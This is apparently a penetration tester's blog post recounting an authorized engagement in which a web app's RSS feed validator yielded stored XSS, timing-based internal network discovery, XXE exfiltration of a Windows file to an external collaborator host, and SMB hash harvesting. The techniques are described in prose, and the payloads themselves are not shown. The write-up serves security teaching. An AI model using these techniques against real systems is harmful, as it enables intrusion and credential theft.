TL;DR – I found stored XSS, timing-based internal network discovery (SSRF), and XXE file exfil plus SMB cred harvest, all in one single Internet-facing web app’s RSS functionality.
Note: My employer was initially fine with me posting reasonably-redacted screenshots but then didn’t put that in writing, so I mocked them up the best I could. Some weren’t feasible to mock up so I left those out. Sorry ¯\_(ツ)_/¯
On a recent engagement, I achieved possibly the highest vulnerability:functionality ratio I’ve ever seen personally. Three separate vulnerabilities, in one function, in one web app.
It was a beast of an app, written in .NET/ASP which is not something I am intimately familiar with. I spent a good chunk of time learning how
VIEWSTATE works, and the various related attacks and defenses. They had pretty solid input filtering; anything even looking like it might be a script tag (even HTML bold tags) was flagged and an error thrown, so anything flowing from my keyboard to their servers was already unlikely to pop XSS. They had similarly good SQLi defenses in place, so after a day of poking for either of those I moved on to other things.
In a few places you could upload files and they were retrieved later in other pages, but again they used really strict filetype checking. We’re talking file extension, contents, rejecting embedded files, everything. And on the retrieving side of things, they all were returned as attachments so no RCE for me.
None of this is particularly relevant, just setting the scene for how frustrated I was at this point.
While trying these things I was still sorta mapping out the application from a user (technically admin) standpoint, when I came across a “Manage News Feeds” link. The purpose was to provide an RSS feed URL which would be embedded on the home page. The two buttons were for testing the feed and then saving it if valid. A good feed would look like this:
while a bad one looked like this:
(images slightly modified from original)
Pretty simple. If it was valid you could save it and the contents would be fetched and rendered each time the home page was reloaded.
Vuln The First
I had mentioned earlier that XSS was pretty much covered “from my keyboard to their servers”. While testing the functionality, I used the following URL as a sample valid RSS feed to see how it would validate and render:
It’s static, and has pretty much what you would expect from RSS, so I figured it would be a good test. When I loaded the URL and clicked Validate Feed, it came back saying it was good so I saved it and reloaded the home page.
To my surprise, there was colored text on the page. And bold. And italics. Check the RSS source and you’ll see what I mean. Basically, there was no escaping or sanitization done on the RSS contents.
It didn’t take too many additional brain cells to make the leap to XSS. I loaded up Pastebin and copied a very basic valid RSS doc from W3Schools, modified to include a simple XSS
alert() PoC (hex-encoded):
then I grabbed the URL, validated it, saved it, and smiled as my alert box popped on the home screen.
Vuln The Second
Alright, so that was a good start but I wanted more.
In my testing of the Validate Feed button I put in some junk domains and noticed that it took longer for those to return than any valid feeds. In fact, it didn’t even seem to matter if the feed was valid at all, as long as the site was listening on 80 or 443. So basically, if a site is online it will return quickly, otherwise there is a measurable delay.
Using Burp Intruder, I was able to feed a list of known internal IP addresses and ports and measure the response times. I got three kinds of responses:
Fast response (r < 600ms)
Slow response (r > 5000ms)
Average response (1000ms < r < 2000ms)
(other responses in above screenshots)
The fast and slow responses correlated with common ports you would expect to see on a Windows web server, and the client confirmed that was in fact the case. I could have gone on enumerating more internal systems, but the point was made already.
Now for the really fun part.
Vuln The Third
I had read about XXE and played around with it in some labs but never encountered it in the wild, so I figured now would be a good time to test for it. Using some sample XXE payloads saved in Pastebin and loaded into the Validate Feed form I was able to confirm that external sites would be requested.
Using these I tested reading a file on-disk, choosing to target
C:\windows\win.ini since it was a Windows box. I actually had some trouble getting this to pop and had to rubber duck debug using a co-worker to bounce ideas off of.
Basically I had two raw Pastebin links and a Burp Collaborator domain. The first Pastebin link contained lines 44 and 45 from the same Gist, with the Burp Collaborator domain as the target instead of
x.x.x.x. The second Pastebin link contained the XXE payload starting on line 33 here with the first Pastebin link in place of
I loaded the first Pastebin link into the RSS Feed box, clicked Validate Feed and…
60 seconds of nothing, to be exact. 60 seconds is a fairly specific time-frame in IT, and usually it ends up being network related, with my standard bet being DNS (pro tip: it’s always DNS).
This time it wasn’t DNS though, because Burp Collaborator was still registering a DNS query, just no HTTP request. As it turns out, using
http:// as the scheme and
:443 as the port can cause some systems to just not make the HTTP request because pOrT 443 iS aLwAyS hTtPs. Whatever, I’m not bitter about it.
Anyway, long story short I dropped the
:443 bit from the Collaborator domain and it worked perfectly:
I got the contents of
win.ini via the GET request and with 5 minutes left in the day took a victory lap around the office. jk, I just cheered and shut down for the day after logging my evidence.
Note: I was unable to embed the file contents in the RSS feed itself for some reason. I didn’t end up having enough time to figure out why, but the end result was the same.
Vuln The Third (And A Half)
As I was packing up, my co-worker said something to the effect of “Congrats on that XXE, lemme know what kind of RCE you get from it”.
Literally me a second later:
In my haste to learn only the bare minimum to get by, I neglected to ever play with the RCE capabilities.
Sadly, in this case I don’t think there was much hope. I tried various C# functions, even one that literally just had
return 0; and all of them caused application errors. Then I saw this comment in the above-linked article and apparently this only works when XSLT parsing is done, which I doubt is the case here. That or there was some protection in place against this sort of attack. That or I didn’t Try Harder™.
At any rate, I was still able to do some pretty cool stuff with it. I spun up a SMB listener on an AWS Kali box, and fed the RSS Validator a
file:// URL pointing to my listener, which caused the target server to make an authenticated SMB request to it:
[ image redacted 😦 ]
This type of request would include the hashed credentials that a legitimate server would need to serve legitimate content over SMB. But I was not running a legitimate server, I just wanted their hash. Which I got:
Fairly redacted of course, but I managed to get the hashed credentials. A few times, actually. Must be some baked-in retry limits somewhere. Sadly I did not end up cracking this password, as the engagement was coming to an end and we needed the cracking rig for other things.
Conclusion The First
Be thorough, and don’t move on from something just because you already found a way to exploit it. Bugs like to clump together, so keep an eye out for similar classes of vulnerabilities if you find one.